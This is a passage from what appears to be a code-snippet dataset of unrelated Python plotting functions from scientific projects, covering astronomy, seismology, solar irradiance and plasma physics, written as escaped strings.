Bins')\n\tplt.xticks(np.arange(0,(len(data)),1))\n\tplt.legend()\n pdf_file.savefig(fig) #saves the current figure into a pdf_file page\n\n\n\t# Plotting observed vs predicted counts--------------------------------------------------------\n\n\tfig = plt.figure()\n plt.title(grbdir + r\" : Observed vs Predicted counts with $\\chi^2$ = {cs:0.1f}\".format(cs=chi_sq))\n plt.errorbar(model_copy,data_copy,xerr=err_model_copy,yerr=err_data_copy,fmt='g.',markersize=2,elinewidth=0.5)\n\tfor i in range(len(model_copy)):\t\n\t\tplt.text(model_copy[i],data_copy[i],Mod_names[i],fontsize=5)\n #plt.plot(np.arange(-1000,1000),fit_line(np.arange(-1000,1000),scaling),'k',linewidth=0.5,label='m = {s:0.2f}'.format(s=scaling))\n\tplt.plot(np.arange(-1000,1000),fit_line_int(np.arange(-1000,1000),scaling,intercept),'k',linewidth=0.5,label='scaling = {s:0.2f}, offset = {i:0.2f}'.format(s=scaling,i=intercept))\n\tplt.plot(np.arange(min(model_copy)-5,max(model_copy)+5),np.ones(len(np.arange(min(model_copy)-5,max(model_copy)+5)))*intercept,'r-',label='intercept',linewidth=0.5)\n plt.xlim(min(model_copy)-5,max(model_copy)+5)\n plt.ylim(min(data_copy)-5,max(data_copy)+5)\n plt.xlabel('Predicted Counts')\n plt.ylabel('Observed Counts')\n\tplt.legend()\n\tplt.grid()\n pdf_file.savefig(fig)\n\t\t\n\tprint \"===============================================================================================\"\n\t\n\treturn", "def plot_tiltres(setup, mtilt, ytilt, yfit, slit=None, outfile=None, show_QA=False, out_dir=None):\n\n plt.rcdefaults()\n plt.rcParams['font.family']= 'times new roman'\n\n # Outfil\n method = inspect.stack()[0][3]\n if (outfile is None) and (not show_QA):\n outfile = qa.set_qa_filename(setup, method, slit=slit, out_dir=out_dir)\n\n # Setup\n plt.figure(figsize=(8, 4.0))\n plt.clf()\n ax = plt.gca()\n\n # 
Scatter plot\n res = (mtilt-ytilt) - yfit\n ax.scatter(mtilt, res)\n\n rms = np.std(res)\n ax.text(0.90, 0.90, 'Slit {:d}: RMS (pix) = {:0.5f}'.format(slit, rms),\n transform=ax.transAxes, size='large', ha='right', color='black')\n # Label\n ax.set_xlabel('Row')\n ax.set_ylabel('Residual (pix)')\n\n # Finish\n plt.tight_layout(pad=0.2, h_pad=0.0, w_pad=0.0)\n if show_QA:\n plt.show()\n else:\n plt.savefig(outfile, dpi=400)\n plt.close()\n\n plt.rcdefaults()\n\n return", "def _display_tsne(self):\n self._tsne_window.clear()\n self._tsne_window.plot(self._Y_tsne[:,0], self._Y_tsne[:,1], 'b.')", "def construct_plot(self, amprtb):\n self.fig, [[self.ax1, self.ax2], [self.ax3, self.ax4]] = \\\n plt.subplots(2, 2, figsize=(10, 10),\n subplot_kw={'projection': self.projection})\n ind1, ind2 = amprtb._get_scan_indices(\n self.scanrange, self.timerange, False)\n\n # 10 GHz plot\n stuff = amprtb.plot_ampr_track(\n var='10'+self.chan, latrange=self.latrange,\n lonrange=self.lonrange, parallels=self.parallels,\n meridians=self.meridians, title='', wmts_layer=self.wmts_layer,\n clevs=self.clevs, cmap=self.cmap, show_track=self.show_track,\n maneuver=self.maneuver, scanrange=self.scanrange,\n show_grid=self.show_grid, equator=self.equator,\n show_qc=self.show_qc, resolution=self.resolution,\n projection=self.projection, ax=self.ax1, fig=self.fig,\n verbose=self.verbose, timerange=self.timerange, return_flag=True)\n self.ax1.set_title(self.make_title('10', amprtb, ind1, ind2))\n\n # 19 GHz plot\n amprtb.plot_ampr_track(\n var='19'+self.chan, latrange=self.latrange,\n lonrange=self.lonrange, parallels=self.parallels,\n meridians=self.meridians, title='', wmts_layer=self.wmts_layer,\n clevs=self.clevs, cmap=self.cmap, show_track=self.show_track,\n maneuver=self.maneuver, scanrange=self.scanrange,\n show_grid=self.show_grid, equator=self.equator,\n show_qc=self.show_qc, resolution=self.resolution,\n projection=self.projection, ax=self.ax2, fig=self.fig,\n verbose=self.verbose, timerange=self.timerange)\n self.ax2.set_title(self.make_title('19', amprtb, ind1, ind2))\n\n # 37 GHz plot\n amprtb.plot_ampr_track(\n var='37'+self.chan, latrange=self.latrange,\n lonrange=self.lonrange, parallels=self.parallels,\n meridians=self.meridians, title='', wmts_layer=self.wmts_layer,\n clevs=self.clevs, cmap=self.cmap, show_track=self.show_track,\n maneuver=self.maneuver, scanrange=self.scanrange,\n show_grid=self.show_grid, equator=self.equator,\n show_qc=self.show_qc, resolution=self.resolution,\n projection=self.projection, ax=self.ax3, fig=self.fig,\n verbose=self.verbose, timerange=self.timerange)\n self.ax3.set_title(self.make_title('37', amprtb, ind1, ind2))\n\n # 85 GHz plot\n amprtb.plot_ampr_track(\n var='85'+self.chan, latrange=self.latrange,\n lonrange=self.lonrange, parallels=self.parallels,\n meridians=self.meridians, title='', wmts_layer=self.wmts_layer,\n clevs=self.clevs, cmap=self.cmap, show_track=self.show_track,\n maneuver=self.maneuver, scanrange=self.scanrange,\n show_grid=self.show_grid, equator=self.equator,\n show_qc=self.show_qc, resolution=self.resolution,\n projection=self.projection, ax=self.ax4, fig=self.fig,\n verbose=self.verbose, timerange=self.timerange)\n self.ax4.set_title(self.make_title('85', amprtb, ind1, ind2))\n\n # plt.tight_layout()\n return True", "def tplot(self, analytes=None, figsize=[10, 4], scale=None, filt=None,\n ranges=False, stats=False, stat='nanmean', err='nanstd',\n interactive=False, focus_stage=None, err_envelope=False):\n\n if interactive:\n enable_notebook() # 
make the plot interactive\n\n if type(analytes) is str:\n analytes = [analytes]\n if analytes is None:\n analytes = self.analytes\n\n if focus_stage is None:\n focus_stage = self.focus_stage\n\n fig = plt.figure(figsize=figsize)\n ax = fig.add_axes([.1,.12,.77,.8])\n\n for a in analytes:\n x = self.Time\n y, yerr = unpack_uncertainties(self.data[focus_stage][a])\n\n if scale == 'log':\n ax.set_yscale('log')\n y[y == 0] = np.nan\n\n if filt:\n ind = self.filt.grab_filt(filt, a)\n xf = x.copy()\n yf = y.copy()\n yerrf = yerr.copy()\n if any(~ind):\n xf[~ind] = np.nan\n yf[~ind] = np.nan\n yerrf[~ind] = np.nan\n if any(~ind):\n ax.plot(x, y, color=self.cmap[a], alpha=.4, lw=0.6)\n ax.plot(xf, yf, color=self.cmap[a], label=a)\n if err_envelope:\n ax.fill_between(xf, yf - yerrf, yf + yerrf, color=self.cmap[a],\n alpha=0.2, zorder=-1)\n else:\n ax.plot(x, y, color=self.cmap[a], label=a)\n if err_envelope:\n ax.fill_between(x, y - yerr, y + yerr, color=self.cmap[a],\n alpha=0.2, zorder=-1)\n\n # Plot averages and error envelopes\n if stats and hasattr(self, 'stats'):\n sts = self.stats[stat][0].size\n if sts > 1:\n for n in np.arange(self.n):\n n_ind = ind & (self.ns == n + 1)\n if sum(n_ind) > 2:\n x = [self.Time[n_ind][0], self.Time[n_ind][-1]]\n y = [self.stats[stat][self.stats['analytes'] == a][0][n]] * 2\n\n yp = ([self.stats[stat][self.stats['analytes'] == a][0][n] +\n self.stats[err][self.stats['analytes'] == a][0][n]] * 2)\n yn = ([self.stats[stat][self.stats['analytes'] == a][0][n] -\n self.stats[err][self.stats['analytes'] == a][0][n]] * 2)\n\n ax.plot(x, y, color=self.cmap[a], lw=2)\n ax.fill_between(x + x[::-1], yp + yn,\n color=self.cmap[a], alpha=0.4,\n linewidth=0)\n else:\n x = [self.Time[0], self.Time[-1]]\n y = [self.stats[stat][self.stats['analytes'] == a][0]] * 2\n yp = ([self.stats[stat][self.stats['analytes'] == a][0] +\n self.stats[err][self.stats['analytes'] == a][0]] * 2)\n yn = ([self.stats[stat][self.stats['analytes'] == a][0] -\n self.stats[err][self.stats['analytes'] == a][0]] * 2)\n\n ax.plot(x, y, color=self.cmap[a], lw=2)\n ax.fill_between(x + x[::-1], yp + yn, color=self.cmap[a],\n alpha=0.4, linewidth=0)\n\n if ranges:\n for lims in self.bkgrng:\n ax.axvspan(*lims, color='k', alpha=0.1, zorder=-1)\n for lims in self.sigrng:\n ax.axvspan(*lims, color='r', alpha=0.1, zorder=-1)\n\n if filt is not None:\n ind = self.filt.grab_filt(filt)\n lims = bool_2_indices(~ind)\n for l, u in lims:\n if u >= len(self.Time):\n u = -1\n ax.axvspan(self.Time[l], self.Time[u], color='k',\n alpha=0.05, lw=0)\n\n # drawn = []\n # for k, v in self.filt.switches.items():\n # for f, s in v.items():\n # if s & (f not in drawn):\n # lims = bool_2_indices(~self.filt.components[f])\n # for u, l in lims:\n # ax.axvspan(self.Time[u-1], self.Time[l], color='k',\n # alpha=0.05, lw=0)\n # drawn.append(f)\n\n ax.text(0.01, 0.99, self.sample + ' : ' + self.focus_stage,\n transform=ax.transAxes,\n ha='left', va='top')\n\n ax.set_xlabel('Time (s)')\n ax.set_xlim(np.nanmin(x), np.nanmax(x))\n \n # y label\n ud = {'rawdata': 'counts',\n 'despiked': 'counts',\n 'bkgsub': 'background corrected counts',\n 'ratios': 'counts/{:s} count',\n 'calibrated': 'mol/mol {:s}'}\n if focus_stage in ['ratios', 'calibrated']:\n ud[focus_stage] = ud[focus_stage].format(self.internal_standard)\n ax.set_ylabel(ud[focus_stage])\n\n if interactive:\n ax.legend()\n plugins.connect(fig, plugins.MousePosition(fontsize=14))\n display.clear_output(wait=True)\n display.display(fig)\n input('Press [Return] when finished.')\n 
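# NB: enable_notebook/disable_notebook and plugins here presumably come from mpld3, with display from IPython; the input() above blocks until the user presses Return.\n 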
disable_notebook() # stop the interactivity\n else:\n ax.legend(bbox_to_anchor=(1.15, 1))\n\n return fig, ax", "def generate_plot(self):\r\n\t\tx, y = zip(*[p.p for p in self.universe])\r\n\t\tself.ax.cla()\r\n\t\tself.ax.plot(x, y, '.')\r\n\t\tself.ax.set_title('Universe at time: %d' % self.universe.time)\r\n\t\tself.ax.set_xlim([P_MU-4*P_STD, P_MU+4*P_STD])\r\n\t\tself.ax.set_ylim([P_MU-4*P_STD, P_MU+4*P_STD])", "def make_source_location_histogram_plots_uvis(data, file_name, ff, im, coordfile, \\\n filt, path_to_cleans=''):\n\tpylab.ion()\n\tif ff == 0:\n\t\tfig = pylab.figure()\n\t\tfig.subplots_adjust(wspace=0.4)\n\telse:\n\t\tpylab.clf()\n\t\t\n\txc,yc = np.loadtxt(coordfile, unpack=True, usecols = (0,1)) \n\t# plot #1 - object position\n\tsz=50.0\n\tx0=np.round(xc)-sz/2.\n\tx1=np.round(xc)+sz/2.\n\ty0=np.round(yc)-sz/2.\n\ty1=np.round(yc)+sz/2.\n\tax1 = pylab.subplot(1,2,1)\n\tax1.imshow(np.log10(im[y0:y1,x0:x1]),interpolation='nearest')\n\tax1.autoscale(axis='both',enable=False)\n\tax1.scatter([xc-x0-1.0], [yc-y0-1.0], marker='x', s=200., color='w')\n\tpylab.title('X = '+str(xc)+' Y = '+str(yc))\n\n\t# plot #2 - background histogram\n\ttmp_image=glob.glob(path_to_cleans + '*back.fits')[0]\n\tbackim = pyfits.getdata(tmp_image)\n\t#--measure back statistics (mean and mode via IRAF)\n\tinitback = iraf.imstatistics(tmp_image+'[0]', fields='mode,stddev', \\\n\t lower = -100, upper = 10000, nclip=7, \\\n\t lsigma=3.0, usigma=3.0, cache='yes', \\\n\t format='no',Stdout=1)\n\t#print 'initback:'\n\t#print initback\n\tif 'INDEF' not in initback[0]:\n\t\tllim = float(initback[0].split(' ')[0]) - 10.0*\\\n\t\t\t\tfloat(initback[0].split(' ')[1])\n\t\tulim = float(initback[0].split(' ')[0]) + 10.0*\\\n\t float(initback[0].split(' ')[1])\n\t\tbackstats=iraf.imstatistics(tmp_image+'[0]', fields='mean,mode', \\\n\t lower=llim, upper=ulim, nclip=7,lsigma=3.0, \\\n\t usigma=3.0, cache='yes', format='no',Stdout=1)\n\t\tbackmean=float(backstats[0].split(' ')[0])\n\t\tbackmode=float(backstats[0].split(' ')[1])\n\t\tfbackim= np.ndarray.flatten(backim)\n\t\tgd=np.where((fbackim > llim) & (fbackim < ulim))[0]\n\t\tbackmedian=meanclip(fbackim[gd],maxiter=7,return_median=1)[0]\n\n\t\tax2 = pylab.subplot(1,2,2)\n\t\tpylab.hist(fbackim[gd],log=True)\n\t\tpylab.ylim(0.5,600000)\n\t\tpylab.xlim(-20,20)\n\t\tpylab.plot([backmode,backmode],[0.5,600000],ls='-',color='red',\\\n\t label='mode')\n\t\tpylab.plot([backmedian,backmedian],[0.5,600000],ls='--',color='aqua',\\\n \t label='median')\n\t\tpylab.plot([backmean,backmean],[0.5,600000],ls=':',color='black',\\\n \t label='mean')\n\t\tpylab.legend(loc=2, handletextpad=0.0, borderpad=0.0, frameon=False, \\\n \t handlelength=1.)\n\t\tpylab.title('Histogram of Background Pixels')\n\t\tpylab.xlabel('Background [e-]')\n\t\tpylab.ylabel('Number of Objects')\n\t\tpylab.annotate('chip '+str(data[ff]['chip']), [0.77,0.95], \\\n \t xycoords='axes fraction')\n\t\tpylab.annotate(filt,[0.77,0.80],xycoords='axes fraction')\n\n\t\t\n\tpylab.savefig(file_name.split('.fits')[0]+'_srcloc.png')\n\tpylab.ioff()", "def plot_visualization(path_results, x_data, y_data, variant_mode, nb_classes, signal_test, args):\n\n\t#path_tsne = path_results + \"/Visualization/train/\" + str(args.step) + \"_2d.csv\"\n\t#data_frame = pd.read_csv(path_tsne)\n\t\n\tpath_maping = path_results + \"/Maping/\" + str(args.subject).split(\".txt\")[0] + \"/\"\n\tfilename = path_maping + \"maping_\" + str(args.step) + \"_\" + str(args.subject).split(\".txt\")[0] + \"_stick\" + str(args.stick) + 
\".png\"\n\n\tprint(\"path_save maping\", path_maping)\n\n\tif not os.path.exists(path_maping):\n\t\tos.makedirs(path_maping)\n\n\t#print(\"path_tsne\", path_tsne)\n\n\tlabel_maping = np.array([10])\n\n\tx_data = np.concatenate((x_data,signal_test),axis=0)\n\ty_data = np.concatenate((y_data,label_maping),axis=0)\n\n\tprint(\"x_data concatenate\",x_data.shape)\n\tprint(\"y_data concatenate\",y_data.shape)\n\n\tdata_frame = tsne_2d(x_data, y_data)\n\n\t\n\t\n\tgroups = data_frame.groupby('label')\n\n\tcluster_names, cluster_colors = get_target_names_dr(nb_classes, args.mode, args, variant_mode)\n\n\tfig = plt.figure(figsize=(20, 10))\n\tax = fig.add_subplot(111)\n\tax.margins(0.05) # Optional, just adds 5% padding to the autoscaling\n\tfor name, group in groups:\n\t\t\n\t\tif cluster_names[name] == str(args.subject):\n\t\t\tax.scatter(group.x, group.y, marker='D', s=150, edgecolors = 'face',label=cluster_names[name], color=cluster_colors[name])\n\t\telse:\n\t\t\tax.scatter(group.x, group.y, marker='o', label=cluster_names[name], color=cluster_colors[name])\n\n\tax.legend(numpoints=1) #show legend with only 1 point\n\tplt.savefig(filename) #save the plot", "def plot(self):\n\t\t\n\t\ttf=tfData(self.shotno,tStart=None,tStop=None)\n\t\t\n\t\t_plt.figure()\n\t\tax1 = _plt.subplot2grid((3,2), (0,1), rowspan=3) #tf\n\t\tax2 = _plt.subplot2grid((3,2), (0,0)) #vf\n\t\tax3 = _plt.subplot2grid((3,2), (1,0),sharex=ax2) #oh\n\t\tax4 = _plt.subplot2grid((3,2), (2, 0),sharex=ax2) #sh\n\t\tfig=_plt.gcf()\n\t\tfig.set_size_inches(10,5)\n\t\t\t\t\n\t\ttStart=-2\n\t\ttStop=20\n\t\t\n\t\tax1.plot(tf.time*1e3,tf.tfBankField)\n\t\tax1.axvspan(tStart,tStop,color='r',alpha=0.3)\n\t\t_plot.finalizeSubplot(ax1,xlabel='Time (s)',xlim=[-150,450],ylabel='TF Field (T)')#,title=self.title\n\t\t\n\t\tax2.plot(self.vfTime*1e3,self.vfBankCurrent*1e-3)\n\t\t_plot.finalizeSubplot(ax2,ylabel='VF Current\\n(kA)')\n\t\t\n\t\tax3.plot(self.ohTime*1e3,self.ohBankCurrent*1e-3)\n\t\t_plot.finalizeSubplot(ax3,ylim=[-20,30],ylabel='OH Current\\n(kA)')\n\t\t\n\t\tax4.plot(self.shTime*1e3,self.shBankCurrent*1e-3)\n\t\t_plot.finalizeSubplot(ax4,ylim=[tStart,tStop],xlabel='Time (s)',ylabel='SH Current\\n(kA)')\n\t\t\n\t\t_plot.finalizeFigure(fig,title=self.title)\n#\t\tfig.set_tight_layout(True)\n\t\t\n\t\treturn fig", "def pf_plot(pf, t):\n xx = pf.XS[t, :, 0]\n yy = pf.XS[t, :, 1]\n ww = pf.WS[t, :]\n plt.scatter(xx, yy, s=ww * 5000)", "def plot_traces(self, cellname, targettime, historytime, srctype, syntype):\n self.tstart = targettime - historytime\n self.istart = int(self.tstart / self.plotdt + 0.5)\n self.tend = targettime + historytime\n self.iend = int(self.tend / self.plotdt + 0.5)\n self.tseries = np.linspace(self.tstart, self.tend, \n self.iend - self.istart)\n if cellname not in self.datafile['/Vm']:\n return []\n vm = self.datafile['/Vm/' + cellname] \n plt.plot(self.tseries, \n normalize(vm[self.istart:self.iend]),\n label=cellname)\n stimdata = np.asarray(self.datafile['/stimulus/stim_bg'])\n stim_start = int(self.tstart/self.simdt+0.5)\n stim_end = int(self.tend/self.simdt+0.5)\n stimdata = stimdata[stim_start: stim_end]\n plt.plot(np.linspace(self.tstart, self.tend, len(stimdata)),\n normalize(stimdata),\n 'r--', \n label='STIMULUS')\n precells = self.plot_presynaptic(cellname, srctype, syntype)\n return precells", "def plot(self):\n\t\tself.plotOfSpect()", "def misclass_plot(epoch, model, features, filters, figname, fgal=0.5, idx=-1):\n # fetch Stripe 82 data\n X, Xcov = fetch_prepped_s82data(epoch, fgal, features, 
filters)\n Xcoadd, Xcoaddcov = fetch_prepped_s82data(epoch, fgal, features,\n filters, use_single=False)\n N = 20000\n X = X[:N]\n Xcov = Xcov[:N]\n Xcoadd = Xcoadd[:N]\n Xcoaddcov = Xcoaddcov[:N]\n ind = (Xcoaddcov[:, idx][:, idx] < 1.) & (Xcov[:, idx][:, idx] < 1.)\n X = X[ind]\n Xcov = Xcov[ind]\n Xcoadd = Xcoadd[ind]\n Xcoaddcov = Xcoaddcov[ind]\n\n # unpickle the XD model\n if type(model) == str: \n f = open(model, 'rb')\n model = cPickle.load(f)\n f.close()\n\n # Calculate the posteriors, draw samples\n a, m, v = model.posterior(X, Xcov)\n posts = np.zeros_like(X)\n for i in range(X.shape[0]):\n posts[i] = np.median(model.sample(a[i], m[i], v[i], size=1000), axis=0)\n\n stol = 0.145\n ptol = 0.03\n Nbins = 12\n magbins = np.linspace(18., 22., Nbins)\n dlt = magbins[1] - magbins[0]\n s = np.zeros(Nbins)\n p = np.zeros(Nbins)\n for i in range(Nbins):\n ind = (Xcoadd[:, 0] > magbins[i] - dlt) & \\\n (Xcoadd[:, 0] <= magbins[i] + dlt)\n sind = ind & (np.abs(Xcoadd[:, idx]) < 0.03)\n gind = ind & (np.abs(Xcoadd[:, idx]) > 0.03)\n ssind = sind & (np.abs(X[:, idx] > stol))\n sgind = gind & (np.abs(X[:, idx] < stol))\n psind = sind & (np.abs(posts[:, idx] > ptol))\n pgind = gind & (np.abs(posts[:, idx] < ptol))\n s[i] = 1. * len(X[ssind, 0]) + len(X[sgind, 0])\n p[i] = 1. * len(X[psind, 0]) + len(X[pgind, 0])\n s[i] /= len(X[ind, 0])\n p[i] /= len(X[ind, 0])\n\n fs = 5\n lsize = 20\n f = pl.figure(figsize=(fs, fs))\n pl.plot(magbins, s, 'k--', drawstyle='steps-mid', label='Single Epoch',\n lw=2)\n pl.plot(magbins, p, 'k', drawstyle='steps-mid', label='XD Posterior', lw=2)\n pl.xlabel('psfmag $r$', fontsize=lsize)\n pl.ylabel('Misclassification Rate', fontsize=lsize)\n f.savefig(figname, bbox_inches='tight')", "def plot(self):\n # Find only unmasked data :\n # xyz, sData, sColor, _ = self._select_unmasked()\n xyz, sData, sColor = self.xyz, self.sData, self.sColor\n\n # Render as cloud points :\n self.mesh = visu.Markers(name='Sources')\n self.mesh.set_data(xyz, edge_color=self.edgecolor, face_color=sColor,\n size=sData, scaling=self.scaling,\n edge_width=self.edgewidth, symbol=self.symbol)\n self.mesh.set_gl_state('translucent')", "def sample_and_plot(self):\n fig = plt.figure()\n ax = plt.axes(projection = '3d')\n ax.plot_surface(self.X, self.Y, self.sample(), cmap = plt.cm.jet, rstride = 2, cstride = 2, linewidth = 1)\n plt.show()", "def plot12(self, dataset, ts_string_indices, source_jpg_folder='jpg_images', extension='jpg', rows=3, cols=4,\n outfname='Sample Frames.png', cmap=None, gui_color='green'):\n # Settings ############################################################\n font_label_box = {\n 'color': 'green',\n 'size': 16,\n }\n font_steering = {'family': 'monospace',\n # 'color': 'darkred',\n 'weight': 'normal',\n 'size': 20,\n }\n ROWS = rows\n COLS = cols\n NUM_IMAGES = ROWS * COLS\n\n # Figure ##############################################################\n # figsize = [width, height]\n fig = plt.figure(figsize=PAPER_A3_LAND, facecolor='white')\n fig.suptitle(\"Sample frames, Dataset: {}\".format(dataset.data_folder), fontsize=20)\n\n for i, ts_string_index in enumerate(ts_string_indices):\n rec = dataset.df.loc[ts_string_index]\n\n timestamp_string = rec['datetime'].strftime(\"%D %H:%M:%S.\") + \"{:.2}\".format(\n str(rec['datetime'].microsecond))\n\n if 'steering_pred_signal' in dataset.df.columns:\n this_label = \"{}\\n{:0.2f}/{:0.2f} steering \\n{:0.2f} throttle\".format(timestamp_string,\n rec['steering_signal'],\n rec['steering_pred_signal'],\n rec['throttle_signal'])\n 
else:\n this_label = \"{}\\n{:0.2f}/ steering \\n{:0.2f} throttle\".format(timestamp_string, rec['steering_signal'],\n rec['throttle_signal'])\n\n ax = fig.add_subplot(ROWS, COLS, i + 1)\n\n # Main Image ##########################################################\n jpg_path = os.path.join(dataset.path_dataset, source_jpg_folder, ts_string_index + '.' + extension)\n assert os.path.exists(jpg_path), \"{} does not exist\".format(jpg_path)\n img = mpl.image.imread(jpg_path)\n ax.imshow(img, cmap=cmap)\n # plt.title(str_label)\n\n # Data box ########################################################\n\n # ax.axes.get_xaxis().set_visible(False)\n # ax.axes.get_yaxis().set_visible(False)\n t = ax.text(5, 25, this_label, color=gui_color, alpha=1)\n # t = plt.text(0.5, 0.5, 'text', transform=ax.transAxes, fontsize=30)\n t.set_bbox(dict(facecolor='white', alpha=0.7, edgecolor='none'))\n\n # Steering widget HUD #################################################\n # Steering HUD: Actual steering signal\n steer_actual = ''.join(['|' if v else '-' for v in dataset.linear_bin(rec['steering_signal'])])\n text_steer = ax.text(80, 105, steer_actual, fontdict=font_steering, horizontalalignment='center',\n verticalalignment='center', color=gui_color)\n # Steering HUD: Predicted steering angle\n if 'steering_pred_signal' in dataset.df.columns:\n steer_pred = ''.join(['◈' if v else ' ' for v in dataset.linear_bin(rec['steering_pred_signal'])])\n text_steer_pred = ax.text(80, 95, steer_pred, fontdict=font_steering, horizontalalignment='center',\n verticalalignment='center', color='red')\n\n outpath = os.path.join(dataset.path_dataset, outfname)\n fig.savefig(outpath)\n logging.debug(\"Wrote Sample Frames figure to {}\".format(outpath))", "def create_lag_plot(series_name, lag = 1):\n plt.figure(figsize = (8,5))\n plt.title('Lag Plot of the Trade Value of Imports')\n plt.xlim(min(series_name), max(series_name))\n plt.ylim(min(series_name), max(series_name))\n lag_plot(series_name, lag = lag)\n plt.show()", "def logplot(in_dir, fname, xlim, ylim, title):\n\n with open(in_dir + fname,'r') as logfile:\n lf_lines = logfile.readlines()\n\n traj_x = []\n traj_y = []\n\n for row in lf_lines:\n if row[:4] == 'pose':\n #print(float(row[10:-2]))\n tup = row[7:]\n sep_pos = tup.find(' , ')\n traj_x.append(float(tup[:sep_pos]))\n traj_y.append(float(tup[sep_pos+3:]))\n\n liveplot(traj_x, traj_y, xlim, ylim, title)", "def update_plot(click, contents, filename, start_date, end_date, freq, window_length, mean_diff,\n max_diff, upper_ll, lower_ll, vardiff, slopedev):\n if click < 1:\n return\n\n # params = pd.read_json(params)\n # params = params.apply(pd.to_numeric)\n # params = params.sort_values('Run')\n\n window_length = int(window_length)\n mean_diff = float(mean_diff)\n max_diff = float(max_diff)\n upper_ll = float(upper_ll)\n lower_ll = float(lower_ll)\n slopedev = float(slopedev)\n vardiff = float(vardiff)\n\n\n df = utils.read_df(contents, filename)\n df = df[(df.index >= start_date) & (df.index <= end_date)]\n df = df[df.index.minute % freq == 0]\n is_clear, components, alpha = \\\n cs_utils.detect_clearsky(df['GHI'], df['GHIcs'], df.index,\n window_length=window_length, mean_diff=mean_diff,\n max_diff=max_diff, upper_line_length=upper_ll, lower_line_length=lower_ll,\n slope_dev=slopedev, var_diff=vardiff, return_components=True)\n\n df['GHIcs'] = df['GHIcs'] * alpha\n fig = tls.make_subplots(rows=2, cols=1, shared_xaxes=True)\n\n plots = []\n plots.append(go.Scatter(x=df.index, y=df['GHI'], name='GHI'))\n 
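# GHIcs was rescaled by the fitted alpha above; the per-criterion traces that follow start hidden (visible='legendonly') so each detect_clearsky component can be toggled from the legend.\n 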
plots.append(go.Scatter(x=df.index, y=df['GHIcs'], name='GHIcs'))\n plots.append(go.Scatter(x=df[is_clear].index, y=df[is_clear]['GHI'], name='PVLib clear', mode='markers'))\n plots.append(go.Scatter(x=df.index, y=components['mean_diff'],\n name='Mean diff.', visible='legendonly'))\n plots.append(go.Scatter(x=df.index, y=components['max_diff'],\n name='Max diff.', visible='legendonly'))\n plots.append(go.Scatter(x=df.index, y=components['line_length'],\n name='Line length', visible='legendonly'))\n plots.append(go.Scatter(x=df.index, y=components['slope_nstd'],\n name='Slope std. dev.', visible='legendonly'))\n plots.append(go.Scatter(x=df.index, y=components['slope_max'],\n name='Max slope diff.', visible='legendonly'))\n\n for p in plots:\n fig.append_trace(p, 1, 1)\n\n plots2 = []\n passes = pd.DataFrame(components)\n for i, test in enumerate(['mean_diff_pass', 'max_diff_pass', 'line_length_pass',\n 'slope_nstd_pass', 'slope_max_pass']):\n slice = passes[test].astype(int)\n ii = i / 4\n yval = [ii] * len(slice.astype(bool) & passes['non_zero'].astype(bool))\n plots2.append(\n go.Scatter(x=df.index[:len(slice)][slice.astype(bool) & passes['non_zero'].astype(bool)],\n y=yval, name='', mode='markers', showlegend=False)\n )\n\n for p in plots2:\n fig.append_trace(p, 2, 1)\n\n fig['layout']['yaxis2'].update(tickmode='text', tickvals=[0, .25, .5, .75, 1],\n ticktext=['Mean diff.', 'Max diff.', 'Line length',\n 'Slope std. dev.', 'Max slope diff.'])\n fig['layout']['xaxis2'].update(title='Date')\n fig['layout']['yaxis2'].update(domain=[0, 0.2])\n fig['layout']['yaxis1'].update(title='GHI / W/m2')\n fig['layout']['yaxis1'].update(domain=[.25, 1])\n fig['layout'].update(height=500, margin={'l': 100})\n fig['layout'].update(title='Window length: {}, mean diff: {}, max diff: {}, upper line length: {}, '\n 'lower line length: {}, max slope difference: {}, std slope difference: {}'\n .format(window_length, mean_diff, max_diff, upper_ll, lower_ll, slopedev, vardiff))\n\n plots = fig\n\n layout = go.Layout(xaxis={'title': 'Date'}, # yaxis={'title': 'W/m2'},\n title='Window length: {}, mean diff: {}, max diff: {}, upper line length: {}, '\n 'lower line length: {}, max slope difference: {}, std slope difference: {}'\n .format(window_length, mean_diff, max_diff, upper_ll, lower_ll, slopedev, vardiff),\n )\n ts_plot = dcc.Graph(id='cs-plot', figure={'data': plots, 'layout': layout})\n\n # scores = [go.Scatter(x=list(range(len(params))),\n # y=params['F-score'],\n # text=utils.df_to_text(params), hoverinfo='text')]\n # scores_layout = go.Layout(xaxis={'title': 'Run', 'tickvals': [i for i in range(1, len(params))],\n # 'ticktext': [str(i + 1) for i in range(1, len(params))],\n # 'range': [0, len(params)]}, yaxis={'title': 'F-score'})\n # scores_plot = dcc.Graph(id='cs-scores', figure={'data': scores, 'layout': scores_layout})\n #\n # table = dt.DataTable(\n # rows=params[['Run', 'Window length', 'Mean difference', 'Max difference',\n # 'Upper line length', 'Lower line length', 'Variance of slopes',\n # 'Max difference of slopes', 'F-score']].round(3).to_dict('records'),\n # columns=['Run', 'Window length', 'Mean difference', 'Max difference',\n # 'Upper line length', 'Lower line length', 'Variance of slopes',\n # 'Max difference of slopes', 'F-score'],\n # selected_row_indices=[],\n # sortable=True,\n # filterable=True,\n # editable=False,\n # id='cs-param_table'\n # )\n\n final = html.Div([\n html.Div(ts_plot)\n ], style={'width': '98%', 'float': 'center', 'pad': {'l': 40}})\n\n return final", "def 
plot_spectra(stream, freqs, amps, data_type, plot_dir, synthetic=True, parameter='none', project='none', run='none'):\n \n import matplotlib.pyplot as plt\n \n # Get station info \n tr = stream[0]\n station = tr.stats.station\n \n # Set up plot\n fig, axs = plt.subplots(3)\n \n # Loop through frequencies and amplitudes \n for i in range(len(freqs)):\n \n # Units\n if data_type == 'disp':\n title = 'Disp'\n units = 'm*s'\n code = 'LX' \n ylim = 10**-4, 6*10**-1\n xlim = 2*10**-3, 5*10**-1\n elif data_type == 'acc':\n title = 'Acc'\n units = 'm/s'\n code = 'HN'\n ylim = 6*10**-15, 6*10**-1\n xlim = .002, 10\n elif data_type == 'vel':\n title = 'Vel'\n units = 'm'\n code = 'HN'\n ylim = 6*10**-15, 8*10**-2\n xlim = .002, 10\n \n # Define label \n if i == 0:\n component = 'E'\n elif i == 1:\n component = 'N'\n elif i == 2:\n component = 'Z'\n label = code + component \n \n # Plot spectra\n axs[i].loglog(freqs[i],amps[i], lw=.8, label=label)\n axs[i].grid(linestyle='--')\n axs[i].set_ylim(ylim)\n axs[i].set_xlim(xlim)\n axs[i].legend()\n\n # Format whole figure\n plt.tight_layout()\n plt.subplots_adjust(hspace=0)\n fig.suptitle(f'{station} {title} Fourier Spectra', fontsize=14, y=1.08)\n fig.text(-.03, 0.5, f'Amplitude {units}', va='center', rotation='vertical')\n plt.xlabel('Frequency (Hz)')\n \n if synthetic:\n 